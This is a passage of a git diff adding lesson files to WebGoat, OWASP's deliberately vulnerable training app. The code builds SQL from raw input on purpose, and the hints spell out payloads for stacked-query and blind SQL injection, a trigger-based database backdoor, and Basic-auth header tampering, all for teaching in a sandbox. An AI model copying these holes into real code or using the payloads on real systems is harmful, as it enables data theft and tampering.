+		    tr.addElement(new TD().addElement(ECSFactory.makePulldown(RESOURCE, resources, resource, 1)));
+		    t.addElement(tr);
+	
+    		tr = new TR();
+		    tr.addElement(new TD("&nbsp;").setColSpan(2).setAlign("center"));
+		    t.addElement(tr);
+		    
+    		tr = new TR();
+		    tr.addElement(new TD(ECSFactory.makeButton("Check Access")).setColSpan(2).setAlign("center"));
+		    t.addElement(tr);
+		    ec.addElement(t);
+		    
+		    if (isAllowed(user, resource))
+		    {
+			if (!getRoles(user).contains("Admin")
+				&& resource.equals("Account Manager"))
+			{
+			    makeSuccess(s);
+			}
+			s.setMessage("User " + user + " " + credentials
+				+ " was allowed to access resource " + resource);
+		    }
+		    else
+		    {
+			s.setMessage("User " + user + " " + credentials
+				+ " did not have privilege to access resource "
+				+ resource);
+		    }
+		}
+		catch (Exception e)
+		{
+		    s.setMessage("Error generating " + this.getClass().getName());
+		    e.printStackTrace();
+		}
+	
+		return (ec);
+    }
+
+
+    /**
+     *  Gets the category attribute of the RoleBasedAccessControl object
+     *
+     * @return    The category value
+     */
+
+    protected Category getDefaultCategory()
+    {
+    	return Category.ACCESS_CONTROL;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the RoleBasedAccessControl object
+     *
+     * @return    The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+		List<String> hints = new ArrayList<String>();
+		hints.add("Many sites attempt to restrict access to resources by role.");
+		hints.add("Developers frequently make mistakes implementing this scheme.");
+		hints.add("Attempt combinations of users, roles, and resources.");
+		return hints;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(10);
+
+
+    protected Integer getDefaultRanking()
+    {
+    	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the resources attribute of the RoleBasedAccessControl object
+     *
+     * @param  rl  Description of the Parameter
+     * @return     The resources value
+     */
+    private List getResources(List rl)
+    {
+		// return the resources allowed for these roles
+		ArrayList<String> list = new ArrayList<String>();
+	
+		if (rl.contains(roles[0]))
+		{
+		    list.add(resources[0]);
+		}
+	
+		if (rl.contains(roles[1]))
+		{
+		    list.add(resources[1]);
+		    list.add(resources[5]);
+		}
+	
+		if (rl.contains(roles[2]))
+		{
+		    list.add(resources[2]);
+		    list.add(resources[3]);
+		}
+	
+		if (rl.contains(roles[3]))
+		{
+		    list.add(resources[4]);
+		    list.add(resources[5]);
+		}
+	
+		return list;
+    }
+
+
+    /**
+     *  Gets the role attribute of the RoleBasedAccessControl object
+     *
+     * @param  user  Description of the Parameter
+     * @return       The role value
+     */
+
+    private List getRoles(String user)
+    {
+		ArrayList<String> list = new ArrayList<String>();
+	
+		if (user.equals(users[0]))
+		{
+		    list.add(roles[0]);
+		}
+		else if (user.equals(users[1]))
+		{
+		    list.add(roles[1]);
+		    list.add(roles[2]);
+		}
+		else if (user.equals(users[2]))
+		{
+		    list.add(roles[0]);
+		    list.add(roles[2]);
+		}
+		else if (user.equals(users[3]))
+		{
+		    list.add(roles[3]);
+		}
+	
+		return list;
+    }
+
+
+    /**
+     *  Gets the title attribute of the AccessControlScreen object
+     *
+     * @return    The title value
+     */
+
+    public String getTitle()
+    {
+		return ("Using an Access Control Matrix");
+    }
+
+
+    // private final static ArrayList userList = new ArrayList(Arrays.asList(users));
+    // private final static ArrayList resourceList = new ArrayList(Arrays.asList(resources));
+    // private final static ArrayList roleList = new ArrayList(Arrays.asList(roles));
+
+    /**
+     *  Please do not ever implement an access control scheme this way! But it's not the worst I've
+     *  seen.
+     *
+     * @param  user      Description of the Parameter
+     * @param  resource  Description of the Parameter
+     * @return           The allowed value
+     */
+
+    private boolean isAllowed(String user, String resource)
+    {
+		List roles = getRoles(user);
+		List resources = getResources(roles);
+		return (resources.contains(resource));
+    }
+    
+    public Element getCredits()
+    {
+    	return super.getCustomCredits("", ASPECT_LOGO);
+    }
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/BackDoors.java b/main/project/JavaSource/org/owasp/webgoat/lessons/BackDoors.java
new file mode 100644
index 000000000..120dc556e
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/BackDoors.java
@@ -0,0 +1,270 @@
+package org.owasp.webgoat.lessons;
+
+import java.sql.Connection;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.BR;
+import org.apache.ecs.html.Div;
+import org.apache.ecs.html.IMG;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.PRE;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TH;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.DatabaseUtilities;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author Sherif Koussa <a href="http://www.macadamian.com">Macadamian
+ *         Technologies.</a>
+ */
+public class BackDoors extends SequentialLessonAdapter
+{
+
+	private final static Integer DEFAULT_RANKING = new Integer(80);
+
+	private final static String USERNAME = "username";
+
+	private final static String SELECT_ST = "select userid, password, ssn, salary, email from employee where userid=";
+
+	private final static IMG MAC_LOGO = new IMG("images/logos/macadamian.gif").setAlt(
+			"Macadamian Technologies").setBorder(0).setHspace(0).setVspace(0);
+
+	protected Element createContent(WebSession s)
+	{
+		return super.createStagedContent(s);
+	}
+
+	protected Element doStage1(WebSession s) throws Exception
+	{
+		return concept1(s);
+	}
+
+	protected Element doStage2(WebSession s) throws Exception
+	{
+		return concept2(s);
+	}
+
+	protected Element concept1(WebSession s) throws Exception
+	{
+		ElementContainer ec = new ElementContainer();
+
+		ec.addElement(makeUsername(s));
+
+		try
+		{
+			String userInput = s.getParser().getRawParameter(USERNAME, "");
+			if (!userInput.equals(""))
+			{
+				userInput = SELECT_ST + userInput;
+				String[] arrSQL = userInput.split(";");
+				Connection conn = DatabaseUtilities.getConnection(s);
+				Statement statement = conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
+						ResultSet.CONCUR_READ_ONLY);
+				if (arrSQL.length == 2)
+				{
+					statement.executeUpdate(arrSQL[1]);
+
+					getLessonTracker(s).setStage(2);
+					s.setMessage("You have succeeded in exploiting the vulnerable query and created another SQL statement. Now move to stage 2 to learn how to create a backdoor or a DB worm");
+				}
+
+				ResultSet rs = statement.executeQuery(arrSQL[0]);
+				if (rs.next())
+				{
+					Table t = new Table(0).setCellSpacing(0).setCellPadding(0).setBorder(1);
+					TR tr = new TR();
+					tr.addElement(new TH("User ID"));
+					tr.addElement(new TH("Password"));
+					tr.addElement(new TH("SSN"));
+					tr.addElement(new TH("Salary"));
+					tr.addElement(new TH("E-Mail"));
+					t.addElement(tr);
+					while (rs.next())
+					{
+						tr = new TR();
+						tr.addElement(new TD(rs.getString("userid")));
+						tr.addElement(new TD(rs.getString("password")));
+						tr.addElement(new TD(rs.getString("ssn")));
+						tr.addElement(new TD(rs.getString("salary")));
+						tr.addElement(new TD(rs.getString("email")));
+						t.addElement(tr);
+					}
+					ec.addElement(t);
+				}
+			}
+		}
+		catch (Exception ex)
+		{
+			ec.addElement(new PRE(ex.getMessage()));
+		}
+		return ec;
+	}
+
+	protected Element concept2(WebSession s) throws Exception
+	{
+		ElementContainer ec = new ElementContainer();
+		ec.addElement(makeUsername(s));
+
+		String userInput = s.getParser().getRawParameter(USERNAME, "");
+
+		if (!userInput.equals(""))
+		{
+			String[] arrSQL = userInput.split(";");
+			if (arrSQL.length == 2)
+			{
+				if (userInput.toUpperCase().indexOf("CREATE TRIGGER") != 0)
+				{
+					makeSuccess(s);
+				}
+			}
+
+		}
+		return ec;
+	}
+
+	public String getInstructions(WebSession s)
+	{
+		String instructions = "";
+
+		if (!getLessonTracker(s).getCompleted())
+		{
+			switch (getStage(s))
+			{
+				case 1:
+					instructions = "Stage " + getStage(s)
+							+ ": Use String SQL Injection to execute more than one SQL Statement. ";
+					instructions = instructions
+							+ " The first stage of this lesson is to teach you how to use a vulnerable field to create two SQL ";
+					instructions = instructions
+							+ " statements. The first is the system's while the second is totally yours.";
+					instructions = instructions
+							+ " Your account ID is 101. This page allows you to see your password, ssn and salary.";
+					instructions = instructions
+							+ "  Try to inject another update to update salary to something higher";
+					break;
+				case 2:
+					instructions = "Stage " + getStage(s)
+							+ ": Use String SQL Injection to inject a backdoor. ";
+					instructions = instructions
+							+ " The second stage of this lesson is to teach you how to use a vulneable fields to inject the DB work or the backdoor.";
+					instructions = instructions
+							+ " Now try to use the same technique to inject a trigger that would act as ";
+					instructions = instructions + " SQL backdoor, the syntax of a trigger is: <br>";
+					instructions = instructions
+							+ " CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHERE userid = NEW.userid<br>";
+					instructions = instructions
+							+ " Note that nothing will actually be executed because the current underlying DB doesn't support triggers.";
+					break;
+			}
+		}
+
+		return instructions;
+	}
+
+	protected Element makeUsername(WebSession s)
+	{
+		ElementContainer ec = new ElementContainer();
+		StringBuffer script = new StringBuffer();
+		script.append("<STYLE TYPE=\"text/css\"> ");
+		script.append(".blocklabel { margin-top: 8pt; }");
+		script.append(".myClass 	{ color:red;");
+		script.append(" font-weight: bold;");
+		script.append("padding-left: 1px;");
+		script.append("padding-right: 1px;");
+		script.append("background: #DDDDDD;");
+		script.append("border: thin black solid; }");
+		script.append("LI	{ margin-top: 10pt; }");
+		script.append("</STYLE>");
+		ec.addElement(new StringElement(script.toString()));
+
+		ec.addElement(new StringElement("User ID: "));
+		Input username = new Input(Input.TEXT, "username", "");
+		ec.addElement(username);
+
+		String userInput = s.getParser().getRawParameter("username", "");
+
+		ec.addElement(new BR());
+		ec.addElement(new BR());
+
+		String formattedInput = "<span class='myClass'>" + userInput + "</span>";
+		ec.addElement(new Div(SELECT_ST + formattedInput));
+
+		Input b = new Input();
+
+		b.setName("Submit");
+		b.setType(Input.SUBMIT);
+		b.setValue("Submit");
+
+		ec.addElement(new PRE(b));
+
+		return ec;
+	}
+
+	public Element getCredits()
+	{
+		return super.getCustomCredits("Created by Sherif Koussa ", MAC_LOGO);
+	}
+
+	protected List<String> getHints(WebSession s)
+	{
+		List<String> hints = new ArrayList<String>();
+		hints.add("Your user id is 101. Use it to see your information");
+		hints.add("A semi-colon usually ends a SQL statement and starts a new one.");
+		hints.add("Try this 101 or 1=1; update employee set salary=100000");
+		hints.add("For stage 2, Try 101; CREATE TRIGGER myBackDoor BEFORE INSERT ON " +
+				"employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com' WHERE userid = NEW.userid");
+		return hints;
+	}
+
+	protected Category getDefaultCategory()
+	{
+		return Category.INJECTION;
+	}
+
+	protected Integer getDefaultRanking()
+	{
+		return DEFAULT_RANKING;
+	}
+
+	public String getTitle()
+	{
+		return ("Database Backdoors ");
+	}
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/BasicAuthentication.java b/main/project/JavaSource/org/owasp/webgoat/lessons/BasicAuthentication.java
new file mode 100644
index 000000000..a7c17a555
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/BasicAuthentication.java
@@ -0,0 +1,331 @@
+package org.owasp.webgoat.lessons;
+
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.apache.ecs.html.TD;
+import org.apache.ecs.html.TR;
+import org.apache.ecs.html.Table;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ *
+ * @author     Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created    October 28, 2003
+ */
+public class BasicAuthentication extends SequentialLessonAdapter
+{
+    private static final String EMPTY_STRING = "";
+
+    private static final String WEBGOAT_BASIC = "webgoat_basic";
+
+    private static final String AUTHORIZATION = "Authorization";
+
+    private static final String ORIGINAL_AUTH = "Original_Auth";
+
+    private static final String ORIGINAL_USER = "Original.user";
+
+    private static final String BASIC = "basic";
+
+    private static final String JSESSIONID = "JSESSIONID";
+
+    private final static String HEADER_NAME = "header";
+
+    private final static String HEADER_VALUE = "value";
+
+
+    /**
+     *  Description of the Method
+     *
+     * @param  s  Description of the Parameter
+     * @return    Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	return super.createStagedContent(s);
+    }
+
+
+    protected Element doStage1(WebSession s) throws Exception
+    {
+	ElementContainer ec = new ElementContainer();
+
+	String headerName = null;
+	String headerValue = null;
+	try
+	{
+	    headerName = new String(s.getParser().getStringParameter(
+		    HEADER_NAME, EMPTY_STRING));
+	    headerValue = new String(s.getParser().getStringParameter(
+		    HEADER_VALUE, EMPTY_STRING));
+
+	    //<START_OMIT_SOURCE>
+	    // FIXME: This won;t work for CBT, we need to use the UserTracker
+	    //Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
+	    if (headerName.equalsIgnoreCase(AUTHORIZATION)
+		    && (headerValue.equals("guest:guest") || headerValue
+			    .equals("webgoat:webgoat")))
+	    {
+		getLessonTracker(s).setStage(2);
+		return doStage2(s);
+	    }
+	    else
+	    {
+		if (headerName.length() > 0
+			&& !headerName.equalsIgnoreCase(AUTHORIZATION))
+		{
+		    s
+			    .setMessage("Basic Authentication header name is incorrect.");
+		}
+		if (headerValue.length() > 0
+			&& !(headerValue.equals("guest:guest") || headerValue
+				.equals("webgoat:webgoat")))
+		{
+		    s
+			    .setMessage("Basic Authentication header value is incorrect.");
+
+		}
+	    }
+	    //<END_OMIT_SOURCE>
+
+	    Table t = new Table(0).setCellSpacing(0).setCellPadding(0)
+		    .setBorder(0);
+	    if (s.isColor())
+	    {
+		t.setBorder(1);
+	    }
+
+	    TR row1 = new TR();
+	    TR row2 = new TR();
+	    row1.addElement(new TD(new StringElement(
+		    "What is the name of the authentication header: ")));
+	    row2
+		    .addElement(new TD(
+			    new StringElement(
+				    "What is the decoded value of the authentication header: ")));
+
+	    row1.addElement(new TD(new Input(Input.TEXT, HEADER_NAME,
+		    headerName.toString())));
+	    row2.addElement(new TD(new Input(Input.TEXT, HEADER_VALUE,
+		    headerValue.toString())));
+
+	    t.addElement(row1);
+	    t.addElement(row2);
+
+	    ec.addElement(t);
+	    ec.addElement(new P());
+
+	    Element b = ECSFactory.makeButton("Submit");
+	    ec.addElement(b);
+
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	return (ec);
+    }
+
+
+    protected Element doStage2(WebSession s) throws Exception
+    {
+	ElementContainer ec = new ElementContainer();
+
+	try
+	{
+	    if (s.getRequest().isUserInRole(WEBGOAT_BASIC))
+	    {
+		String originalUser = getLessonTracker(s).getLessonProperties()
+			.getProperty(ORIGINAL_USER, EMPTY_STRING);
+		getLessonTracker(s, originalUser).setCompleted(true);
+		getLessonTracker(s, originalUser).setStage(1);
+		getLessonTracker(s, originalUser).store(s, this);
+		makeSuccess(s);
+		s.setMessage("Close your browser and login as " + originalUser
+			+ " to get your green stars back.");
+		return ec;
+	    }
+	    else
+	    {
+		// If we are still in the ORIGINAL_USER role see if the Basic Auth header has been manipulated
+		String originalAuth = getLessonTracker(s).getLessonProperties()
+			.getProperty(ORIGINAL_AUTH, EMPTY_STRING);
+		String originalSessionId = getLessonTracker(s)
+			.getLessonProperties().getProperty(JSESSIONID,
+				s.getCookie(JSESSIONID));
+
+		// store the original user info in the BASIC properties files
+		if (originalSessionId.equals(s.getCookie(JSESSIONID)))
+		{
+		    // Store the original user name in the "basic" user properties file.  We need to use
+		    // the original user to access the correct properties file to update status.
+		    // store the initial auth header
+		    getLessonTracker(s).getLessonProperties().setProperty(
+			    JSESSIONID, originalSessionId);
+		    getLessonTracker(s).getLessonProperties().setProperty(
+			    ORIGINAL_AUTH, s.getHeader(AUTHORIZATION));
+		    getLessonTracker(s, BASIC).getLessonProperties()
+			    .setProperty(ORIGINAL_USER, s.getUserName());
+		    getLessonTracker(s, BASIC).setStage(2);
+		    getLessonTracker(s, BASIC).store(s, this, BASIC);
+		}
+
+		s.setMessage("Congratulations, you have figured out the mechanics of basic authentication.");
+		s.setMessage("&nbsp;&nbsp;- Now you must try to make WebGoat reauthenticate you as:  ");
+		s.setMessage("&nbsp;&nbsp;&nbsp;&nbsp;- username:  basic");
+		s.setMessage("&nbsp;&nbsp;&nbsp;&nbsp;- password:  basic");
+		s.setMessage("Use the Basic Authentication Menu to start at login page.");
+
+		// If the auth header is different but still the original user - tell the user
+		// that the original cookie was posted bak and basic auth uses the cookie before the
+		// authorization token
+		if (!originalAuth.equals("")
+			&& !originalAuth.equals(s.getHeader(AUTHORIZATION)))
+		{
+		    ec
+			    .addElement("You're almost there!  You've modified the "
+				    + AUTHORIZATION
+				    + " header but you are "
+				    + "still logged in as "
+				    + s.getUserName()
+				    + ".  Look at the request after you typed in the 'basic' "
+				    + "user credentials and submitted the request.  Remember the order of events that occur during Basic Authentication.");
+		}
+		else if (!originalSessionId.equals(s.getCookie(JSESSIONID)))
+		{
+		    ec
+			    .addElement("You're really close!  Changing the session cookie caused the server to create a new session for you.  This did not cause the server to reauthenticate you.  "
+				    + "When you figure out how to force the server to perform an authentication request, you have to authenticate as:<br><br>"
+				    + "&nbsp;&nbsp;&nbsp;&nbsp;user name: basic<br> "
+				    + "&nbsp;&nbsp;&nbsp;&nbsp;password: basic<br>");
+		}
+		else
+		{
+		    ec.addElement("Use the hints!  One at a time...");
+		}
+
+	    }
+
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	return (ec);
+    }
+
+
+    /**
+     *  Gets the category attribute of the ForgotPassword object
+     *
+     * @return    The category value
+     */
+    protected Category getDefaultCategory()
+    {
+
+	return Category.AUTHENTICATION;
+    }
+
+
+    /**
+     *  Gets the hints attribute of the HelloScreen object
+     *
+     * @return    The hints value
+     */
+    public List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	//		int stage = getLessonTracker(session, BASIC).getStage();
+
+	//		switch ( stage )
+	//		{
+	//				case 1:
+	hints
+		.add("Basic authentication uses a cookie to pass the credentials. "
+			+ "Use a proxy to intercept the request.  Look at the cookies.");
+	hints
+		.add("Basic authentication uses Base64 encoding to 'scramble' the "
+			+ "user's login credentials.");
+	hints
+		.add("Basic authentication uses 'Authorization' as the cookie name to "
+			+ "store the user's credentials.");
+	hints.add("Use WebScarab -> Tools -> Transcoder to Base64 decode the "
+		+ "the value in the Authorization cookie.");
+	//					break;
+	//				case 2:
+	hints
+		.add("Basic authentication uses a cookie to pass the credentials. "
+			+ "Use a proxy to intercept the request.  Look at the cookies.");
+	hints
+		.add("Before the WebServer requests credentials from the client, the current "
+			+ "session is checked for validitity.");
+	hints
+		.add("If the session is invalid the webserver will use the basic authentication credentials");
+	hints
+		.add("If the session is invalid and the basic authentication credentials are invalid, "
+			+ "new credentials will be requested from the client.");
+	hints
+		.add("Intercept the request and corrupt the JSESSIONID and the Authorization header.");
+	//					break;
+	//		}
+
+	return hints;
+    }
+
+    private final static Integer DEFAULT_RANKING = new Integer(100);
+
+
+    protected Integer getDefaultRanking()
+    {
+	return DEFAULT_RANKING;
+    }
+
+
+    /**
+     *  Gets the title attribute of the HelloScreen object
+     *
+     * @return    The title value
+     */
+    public String getTitle()
+    {
+	return ("Basic Authentication");
+    }
+    
+}
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java b/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java
new file mode 100644
index 000000000..c7d46d3ba
--- /dev/null
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/BlindSqlInjection.java
@@ -0,0 +1,317 @@
+package org.owasp.webgoat.lessons;
+
+import java.sql.Connection;
+import java.sql.ResultSet;
+import java.sql.SQLException;
+import java.sql.Statement;
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.ecs.Element;
+import org.apache.ecs.ElementContainer;
+import org.apache.ecs.StringElement;
+import org.apache.ecs.html.Input;
+import org.apache.ecs.html.P;
+import org.owasp.webgoat.session.DatabaseUtilities;
+import org.owasp.webgoat.session.ECSFactory;
+import org.owasp.webgoat.session.WebSession;
+
+/*******************************************************************************
+ * 
+ * 
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ * 
+ * Copyright (c) 2002 - 2007 Bruce Mayhew
+ * 
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ * 
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ * 
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ * 
+ * Getting Source ==============
+ * 
+ * Source for this application is maintained at code.google.com, a repository
+ * for free software projects.
+ * 
+ * For details, please see http://code.google.com/p/webgoat/
+ * 
+ * @author Chuck Willis <a href="http://www.securityfoundry.com">Chuck's web
+ *         site</a> (this lesson is heavily based on Bruce Mayhews' SQL
+ *         Injection lesson
+ * @created January 14, 2005
+ */
+public class BlindSqlInjection extends LessonAdapter
+{
+
+    private final static String ACCT_NUM = "account_number";
+
+    private final static int TARGET_ACCT_NUM = 15613;
+
+    /**
+     * Description of the Method
+     * 
+     * @param s
+     *                Description of the Parameter
+     * @return Description of the Return Value
+     */
+    protected Element createContent(WebSession s)
+    {
+	ElementContainer ec = new ElementContainer();
+
+	try
+	{
+	    Connection connection = DatabaseUtilities.getConnection(s);
+
+	    ec.addElement(new P().addElement("Enter your Account Number: "));
+
+	    String accountNumber = s.getParser().getRawParameter(ACCT_NUM, "101");
+	    Input input = new Input(Input.TEXT, ACCT_NUM, accountNumber.toString());
+	    ec.addElement(input);
+
+	    Element b = ECSFactory.makeButton("Go!");
+	    ec.addElement(b);
+
+	    String query = "SELECT * FROM user_data WHERE userid = " + accountNumber;
+	    String answer_query;
+	    if (runningOnWindows())
+	    {
+		answer_query = "SELECT TOP 1 first_name FROM user_data WHERE userid = "
+			+ TARGET_ACCT_NUM;
+	    } else
+	    {
+		answer_query = "SELECT first_name FROM user_data WHERE userid = " + TARGET_ACCT_NUM;
+	    }
+
+	    try
+	    {
+		Statement answer_statement = connection.createStatement(
+			ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+		ResultSet answer_results = answer_statement.executeQuery(answer_query);
+		answer_results.first();
+		System.out.println("Account: " + accountNumber );
+		System.out.println("Answer : " + answer_results.getString(1));
+		if (accountNumber.toString().equals(answer_results.getString(1)))
+		{
+		    makeSuccess(s);
+		} else
+		{
+
+		    Statement statement = connection.createStatement(
+			    ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
+		    ResultSet results = statement.executeQuery(query);
+
+		    if ((results != null) && (results.first() == true))
+		    {
+			ec.addElement(new P().addElement("Account number is valid"));
+		    } else
+		    {
+			ec.addElement(new P().addElement("Invalid account number"));
+		    }
+		}
+	    }
+	    catch (SQLException sqle)
+	    {
+		ec.addElement(new P().addElement("An error occurred, please try again."));
+	    }
+	}
+	catch (Exception e)
+	{
+	    s.setMessage("Error generating " + this.getClass().getName());
+	    e.printStackTrace();
+	}
+
+	return (ec);
+    }
+
+    /**
+     * Gets the category attribute of the SqlInjection object
+     * 
+     * @return The category value
+     */
+    protected Category getDefaultCategory()
+    {
+	return Category.INJECTION;
+    }
+
+    /**
+     * Gets the credits attribute of the AbstractLesson object
+     * 
+     * @return The credits value
+     */
+    public Element getCredits()
+    {
+	return new StringElement("By Chuck Willis");
+    }
+
+    /**
+     * 
+     * Determines the OS that WebGoat is running on. Needed because different DB
+     * backends are used on the different OSes (Access on Windows, InstantDB on
+     * others)
+     * 
+     * @return true if running on Windows, false otherwise
+     */
+    private boolean runningOnWindows()
+    {
+	String os = System.getProperty("os.name", "Windows");
+	if (os.toLowerCase().indexOf("window") != -1)
+	{
+	    return true;
+	} else
+	{
+	    return false;
+	}
+    }
+
+    /**
+     * Gets the hints attribute of the DatabaseFieldScreen object
+     * 
+     * @return The hints value
+     */
+    protected List<String> getHints(WebSession s)
+    {
+	List<String> hints = new ArrayList<String>();
+	if (runningOnWindows())
+	{
+	    hints
+		    .add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. "
+			    + "Create a SQL statement that you can use as a true/false test and then "
+			    + "select the first character of the target element and do a start narrowing "
+			    + "down the character using > and <"
+			    + "<br><br>The backend database is Microsoft Access.  Keep that in mind if you research SQL functions "
+			    + "on the Internet since different databases use some different functions and syntax.");
+	    hints.add("This is the code for the query being built and issued by WebGoat:<br><br> "
+		    + "\"SELECT * FROM user_data WHERE userid = \" + accountNumber ");
+	    hints
+		    .add("The application is taking your input and inserting it at the end of a pre-formed SQL command. "
+			    + "You will need to make use of the following SQL functions: "
+			    + "<br><br>SELECT - query for your target data and get a string "
+			    + "<br><br>mid(string, start, length) - returns a "
+			    + "substring of string starting at the start character and going for length characters "
+			    + "<br><br>asc(string) will return the ascii value of the first character in string "
+			    + "<br><br>&gt and &lt - once you have a character's value, compare it to a choosen one");
+	    hints
+		    .add("Example: is the first character of the first_name of userid "
+			    + TARGET_ACCT_NUM
+			    + " less than 'M' (ascii 77)? "
+			    + "<br><br>101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid="
+			    + TARGET_ACCT_NUM
+			    + ") , 1 , 1) ) < 77 ); "
+			    + "<br><br>If you get back that account number is valid, then yes.  If get back that the number is"
+			    + "invalid then answer is no.");
+	    hints
+		    .add("Another example: is the second character of the first_name of userid "
+			    + TARGET_ACCT_NUM
+			    + " greater than 'm' (ascii 109)? "
+			    + "<br><br>101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid="
+			    + TARGET_ACCT_NUM
+			    + ") , 2 , 1) ) > 109 ); "
+			    + "<br><br>If you get back that account number is valid, then yes.  If get back that the number is "
+			    + "invalid then answer is no.");
+	} else
+	{
+	    hints
+		    .add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. "
+			    + "Create a SQL statement that you can use as a true/false test and then "
+			    + "select the first character of the target element and do a start narrowing "
+			    + "down the character using > and <");
+
+	    hints
+		    .add("The database backend is InstantDB.  Here is a reference guide : <a href=\"http://www.instantdb.com/doc/syntax.html\" target=\"_blank\">http://www.instantdb.com/doc/syntax.html</a>");
+	    hints.add("This is the code for the query being built and issued by WebGoat:<br><br> "
+		    + "\"SELECT * FROM user_data WHERE userid = \" + accountNumber ");
+	    hints
+		    .add("THIS HINT IS FOR THE MS ACCESS DB.  IT NEEDS TO BE ALTERED FOR THE INSTANTDB BACKEND. <br><br>The application is taking your input and inserting it at the end of a pre-formed SQL command. "
+			    + "You will need to make use of the following SQL functions: "
+			    + "<br><br>SELECT - query for your target data and get a string "
+			    + "<br><br>mid(string, start, length) - returns a "
+			    + "substring of string starting at the start character and going for length characters "
+			    + "<br><br>asc(string) will return the ascii value of the first character in string "
+			    + "<br><br>&gt and &lt - once you have a character's value, compare it to a choosen one");
+	    hints
+		    .add("THIS HINT IS FOR THE MS ACCESS DB.  IT NEEDS TO BE ALTERED FOR THE INSTANTDB BACKEND. <br><br>Example: is the first character of the first_name of userid "
+			    + TARGET_ACCT_NUM
+			    + " less than 'M' (ascii 77)? "
+			    + "<br><br>101 AND (asc( mid((SELECT first_name FROM user_data WHERE userid="
+			    + TARGET_ACCT_NUM
+			    + ") , 1 , 1) ) < 77 ); "
